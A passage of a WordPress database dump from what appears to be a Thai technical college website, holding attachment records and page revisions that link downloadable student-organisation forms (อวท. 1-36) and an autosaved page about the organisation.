(2680, 1, '2018-05-23 08:39:48', '2018-05-23 01:39:48', '', 'อวท.13', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-13', '', '', '2018-05-23 08:39:48', '2018-05-23 01:39:48', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.13.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2681, 1, '2018-05-23 08:39:50', '2018-05-23 01:39:50', '', 'อวท.14', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-14', '', '', '2018-05-23 08:39:50', '2018-05-23 01:39:50', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.14.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2682, 1, '2018-05-23 08:39:52', '2018-05-23 01:39:52', '', 'อวท.15', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-15', '', '', '2018-05-23 08:39:52', '2018-05-23 01:39:52', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.15.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2683, 1, '2018-05-23 08:39:54', '2018-05-23 01:39:54', '', 'อวท.16', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-16', '', '', '2018-05-23 08:39:54', '2018-05-23 01:39:54', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.16.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2684, 1, '2018-05-23 08:39:56', '2018-05-23 01:39:56', '', 'อวท.17', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-17', '', '', '2018-05-23 08:39:56', '2018-05-23 01:39:56', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.17.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2685, 1, '2018-05-23 08:39:58', '2018-05-23 01:39:58', '', 'อวท.18', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-18', '', '', '2018-05-23 08:39:58', '2018-05-23 01:39:58', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.18.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2686, 1, '2018-05-23 08:40:03', '2018-05-23 01:40:03', '', 'อวท.19', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-19', '', '', '2018-05-23 08:40:03', '2018-05-23 01:40:03', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.19.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2687, 1, '2018-05-23 08:40:07', '2018-05-23 01:40:07', '', 'อวท.20', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-20', '', '', '2018-05-23 08:40:07', '2018-05-23 01:40:07', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.20.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2688, 1, '2018-05-23 08:40:09', '2018-05-23 01:40:09', '', 'อวท.21', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-21', '', '', '2018-05-23 08:40:09', '2018-05-23 01:40:09', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.21.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2689, 1, '2018-05-23 08:40:11', '2018-05-23 01:40:11', '', 'อวท.22', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-22', '', '', '2018-05-23 08:40:11', '2018-05-23 01:40:11', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.22.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2690, 1, '2018-05-23 08:40:13', '2018-05-23 01:40:13', '', 'อวท.23', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-23', '', '', '2018-05-23 08:40:13', '2018-05-23 01:40:13', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.23.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2691, 1, '2018-05-23 08:40:15', '2018-05-23 01:40:15', '', 'อวท.24', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-24', '', '', '2018-05-23 08:40:15', '2018-05-23 01:40:15', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.24.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2692, 1, '2018-05-23 08:40:23', '2018-05-23 01:40:23', '', 'อวท.25.1', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-25-1', '', '', '2018-05-23 08:40:23', '2018-05-23 01:40:23', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.25.1.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2693, 1, '2018-05-23 08:40:25', '2018-05-23 01:40:25', '', 'อวท.25', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-25', '', '', '2018-05-23 08:40:25', '2018-05-23 01:40:25', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.25.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2694, 1, '2018-05-23 08:40:27', '2018-05-23 01:40:27', '', 'อวท.27', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-27', '', '', '2018-05-23 08:40:27', '2018-05-23 01:40:27', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.27.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2695, 1, '2018-05-23 08:40:28', '2018-05-23 01:40:28', '', 'อวท.28docx', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-28docx', '', '', '2018-05-23 08:40:28', '2018-05-23 01:40:28', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.28docx.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2696, 1, '2018-05-23 08:40:30', '2018-05-23 01:40:30', '', 'อวท.29', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-29', '', '', '2018-05-23 08:40:30', '2018-05-23 01:40:30', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.29.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2697, 1, '2018-05-23 08:40:37', '2018-05-23 01:40:37', '', 'อวท.30', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-30', '', '', '2018-05-23 08:40:37', '2018-05-23 01:40:37', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.30.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2698, 1, '2018-05-23 08:40:39', '2018-05-23 01:40:39', '', 'อวท.31', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-31', '', '', '2018-05-23 08:40:39', '2018-05-23 01:40:39', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.31.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2699, 1, '2018-05-23 08:40:41', '2018-05-23 01:40:41', '', 'อวท.32', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-32', '', '', '2018-05-23 08:40:41', '2018-05-23 01:40:41', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.32.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2700, 1, '2018-05-23 08:40:43', '2018-05-23 01:40:43', '', 'อวท.33', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-33', '', '', '2018-05-23 08:40:43', '2018-05-23 01:40:43', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.33.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2701, 1, '2018-05-23 08:40:45', '2018-05-23 01:40:45', '', 'อวท.34', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-34', '', '', '2018-05-23 08:40:45', '2018-05-23 01:40:45', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.34.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2702, 1, '2018-05-23 08:40:47', '2018-05-23 01:40:47', '', 'อวท.35', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-35', '', '', '2018-05-23 08:40:47', '2018-05-23 01:40:47', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.35.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2703, 1, '2018-05-23 08:40:55', '2018-05-23 01:40:55', '', 'อวท.36', '', 'inherit', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%a7%e0%b8%97-36', '', '', '2018-05-23 08:40:55', '2018-05-23 01:40:55', '', 2661, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/อวท.36.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2704, 1, '2018-05-23 09:02:40', '2018-05-23 02:02:40', ' \r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.02.4.docx\">อวท.02.4</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.03docx.docx\">อวท.03</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.04.docx\">อวท.04</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.05.docx\">อวท.05</a> <a href=\"/wp-content/uploads/2018/05/อวท.05.1.docx\">อวท.05.1</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.06.docx\">อวท.06</a> <a href=\"/wp-content/uploads/2018/05/อวท.06.1.docx\">อวท.06.1</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.07.docx\">อวท.07</a> <a href=\"/wp-content/uploads/2018/05/อวท.07.1.docx\">อวท.07.1</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.08.docx\">อวท.08</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.09.docx\">อวท.09</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.10.docx\">อวท.10</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.11.1.docx\">อวท.11.1</a> <a href=\"/wp-content/uploads/2018/05/อวท.11.docx\">อวท.11</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.12.docx\">อวท.12</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.13.docx\">อวท.13</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.14.docx\">อวท.14</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.15.docx\">อวท.15</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.16.docx\">อวท.16</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.17.docx\">อวท.17</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.18.docx\">อวท.18</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.19.docx\">อวท.19</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.20.docx\">อวท.20</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.21.docx\">อวท.21</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.22.docx\">อวท.22</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.23.docx\">อวท.23</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.24.docx\">อวท.24</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.25.docx\">อวท.25</a> <a href=\"/wp-content/uploads/2018/05/อวท.25.1.docx\">อวท.25.1</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.27.docx\">อวท.27</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.28docx.docx\">อวท.28</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.29.docx\">อวท.29</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.30.docx\">อวท.30</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.31.docx\">อวท.31</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.32.docx\">อวท.32</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.33.docx\">อวท.33</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.34.docx\">อวท.34</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.35.docx\">อวท.35</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.36.docx\">อวท.36</a>', 'แบบ อวท. 1-36', '', 'inherit', 'closed', 'closed', '', '2661-revision-v1', '', '', '2018-05-23 09:02:40', '2018-05-23 02:02:40', '', 2661, 'http://www.technicrayong.ac.th/2661-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2706, 1, '2018-05-23 09:03:51', '2018-05-23 02:03:51', ' \r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.02.3.docx\">อวท.02.3</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.4.docx\">อวท.02.4</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.03docx.docx\">อวท.03</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.04.docx\">อวท.04</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.05.docx\">อวท.05</a> <a href=\"/wp-content/uploads/2018/05/อวท.05.1.docx\">อวท.05.1</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.06.docx\">อวท.06</a> <a href=\"/wp-content/uploads/2018/05/อวท.06.1.docx\">อวท.06.1</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.07.docx\">อวท.07</a> <a href=\"/wp-content/uploads/2018/05/อวท.07.1.docx\">อวท.07.1</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.08.docx\">อวท.08</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.09.docx\">อวท.09</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.10.docx\">อวท.10</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.11.1.docx\">อวท.11.1</a> <a href=\"/wp-content/uploads/2018/05/อวท.11.docx\">อวท.11</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.12.docx\">อวท.12</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.13.docx\">อวท.13</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.14.docx\">อวท.14</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.15.docx\">อวท.15</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.16.docx\">อวท.16</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.17.docx\">อวท.17</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.18.docx\">อวท.18</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.19.docx\">อวท.19</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.20.docx\">อวท.20</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.21.docx\">อวท.21</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.22.docx\">อวท.22</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.23.docx\">อวท.23</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.24.docx\">อวท.24</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.25.docx\">อวท.25</a> <a href=\"/wp-content/uploads/2018/05/อวท.25.1.docx\">อวท.25.1</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.27.docx\">อวท.27</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.28docx.docx\">อวท.28</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.29.docx\">อวท.29</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.30.docx\">อวท.30</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.31.docx\">อวท.31</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.32.docx\">อวท.32</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.33.docx\">อวท.33</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.34.docx\">อวท.34</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.35.docx\">อวท.35</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/05/อวท.36.docx\">อวท.36</a>', 'แบบ อวท. 1-36', '', 'inherit', 'closed', 'closed', '', '2661-revision-v1', '', '', '2018-05-23 09:03:51', '2018-05-23 02:03:51', '', 2661, 'http://www.technicrayong.ac.th/2661-revision-v1/', 0, 'revision', '', 0),
(2707, 1, '2018-05-23 09:12:55', '2018-05-23 02:12:55', '<h2><a href=\"/wp-content/uploads/2018/05/อวท.01.1.docx\">อวท.01</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.02.2.docx\">อวท.02</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.3.docx\">อวท.02.2</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.4.docx\">อวท.02.3</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.03docx.docx\">อวท.03</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.04.docx\">อวท.04</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.05.docx\">อวท.05</a> <a href=\"/wp-content/uploads/2018/05/อวท.05.1.docx\">อวท.05.1</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.06.docx\">อวท.06</a> <a href=\"/wp-content/uploads/2018/05/อวท.06.1.docx\">อวท.06.1</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.07.docx\">อวท.07</a> <a href=\"/wp-content/uploads/2018/05/อวท.07.1.docx\">อวท.07.1</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.08.docx\">อวท.08</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.09.docx\">อวท.09</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.10.docx\">อวท.10</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.11.docx\">อวท.11</a> <a href=\"/wp-content/uploads/2018/05/อวท.11.1.docx\">อวท.11.1</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.12.docx\">อวท.12</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.13.docx\">อวท.13</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.14.docx\">อวท.14</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.15.docx\">อวท.15</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.16.docx\">อวท.16</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.17.docx\">อวท.17</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.18.docx\">อวท.18</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.19.docx\">อวท.19</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.20.docx\">อวท.20</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.21.docx\">อวท.21</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.22.docx\">อวท.22</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.23.docx\">อวท.23</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.24.docx\">อวท.24</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.25.docx\">อวท.25</a> <a href=\"/wp-content/uploads/2018/05/อวท.25.1.docx\">อวท.25.1</a></h2>\r\n<h2></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.27.docx\">อวท.27</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.28docx.docx\">อวท.28</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.29.docx\">อวท.29</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.30.docx\">อวท.30</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.31.docx\">อวท.31</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.32.docx\">อวท.32</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.33.docx\">อวท.33</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.34.docx\">อวท.34</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.35.docx\">อวท.35</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.36.docx\">อวท.36</a></h2>', 'แบบ อวท. 1-36', '', 'inherit', 'closed', 'closed', '', '2661-revision-v1', '', '', '2018-05-23 09:12:55', '2018-05-23 02:12:55', '', 2661, 'http://www.technicrayong.ac.th/2661-revision-v1/', 0, 'revision', '', 0),
(2708, 1, '2018-05-23 09:13:10', '2018-05-23 02:13:10', '<h2><a href=\"/wp-content/uploads/2018/05/อวท.01.1.docx\">อวท.01</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.02.2.docx\">อวท.02</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.3.docx\">อวท.02.1</a> <a href=\"/wp-content/uploads/2018/05/อวท.02.4.docx\">อวท.02.2</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.03docx.docx\">อวท.03</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.04.docx\">อวท.04</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.05.docx\">อวท.05</a> <a href=\"/wp-content/uploads/2018/05/อวท.05.1.docx\">อวท.05.1</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.06.docx\">อวท.06</a> <a href=\"/wp-content/uploads/2018/05/อวท.06.1.docx\">อวท.06.1</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.07.docx\">อวท.07</a> <a href=\"/wp-content/uploads/2018/05/อวท.07.1.docx\">อวท.07.1</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.08.docx\">อวท.08</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.09.docx\">อวท.09</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.10.docx\">อวท.10</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.11.docx\">อวท.11</a> <a href=\"/wp-content/uploads/2018/05/อวท.11.1.docx\">อวท.11.1</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.12.docx\">อวท.12</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.13.docx\">อวท.13</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.14.docx\">อวท.14</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.15.docx\">อวท.15</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.16.docx\">อวท.16</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.17.docx\">อวท.17</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.18.docx\">อวท.18</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.19.docx\">อวท.19</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.20.docx\">อวท.20</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.21.docx\">อวท.21</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.22.docx\">อวท.22</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.23.docx\">อวท.23</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.24.docx\">อวท.24</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.25.docx\">อวท.25</a> <a href=\"/wp-content/uploads/2018/05/อวท.25.1.docx\">อวท.25.1</a></h2>\r\n<h2></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.27.docx\">อวท.27</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.28docx.docx\">อวท.28</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.29.docx\">อวท.29</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.30.docx\">อวท.30</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.31.docx\">อวท.31</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.32.docx\">อวท.32</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.33.docx\">อวท.33</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.34.docx\">อวท.34</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.35.docx\">อวท.35</a></h2>\r\n<h2><a href=\"/wp-content/uploads/2018/05/อวท.36.docx\">อวท.36</a></h2>', 'แบบ อวท. 1-36', '', 'inherit', 'closed', 'closed', '', '2661-revision-v1', '', '', '2018-05-23 09:13:10', '2018-05-23 02:13:10', '', 2661, 'http://www.technicrayong.ac.th/2661-revision-v1/', 0, 'revision', '', 0),
(2709, 1, '2018-08-18 13:33:23', '2018-08-18 06:33:23', '<h3><img class=\"aligncenter size-medium wp-image-2787\" src=\"/wp-content/uploads/2018/05/อ.ฉัตรเฉลิม-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2788\" src=\"/wp-content/uploads/2018/05/นายก-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2789\" src=\"/wp-content/uploads/2018/05/รอง-2-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter wp-image-2790 size-full\" src=\"/wp-content/uploads/2018/05/28-5-2561-11-05-34.jpg\" alt=\"\" width=\"835\" height=\"630\" /></h3>\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ</span> <a href=\"/ตัวอย่างรูปเล่มรายงานช\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบ อวท. 1-36 <a href=\"/แบบ-อวท-1-36\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์มอื่นๆ ขององค์การนักวิชาชีพฯ <a href=\"/แบบฟอร์มอื่นๆ-ของงานองค\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>\r\n<h3><span style=\"color: #0000ff;\">แนวปฏิบัติ อวท. <a href=\"/wp-content/uploads/2018/08/3.แนวปฏิบัติของ-อวท.-.doc\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'inherit', 'closed', 'closed', '', '2555-autosave-v1', '', '', '2018-08-18 13:33:23', '2018-08-18 06:33:23', '', 2555, 'http://www.technicrayong.ac.th/2555-autosave-v1/', 0, 'revision', '', 0),
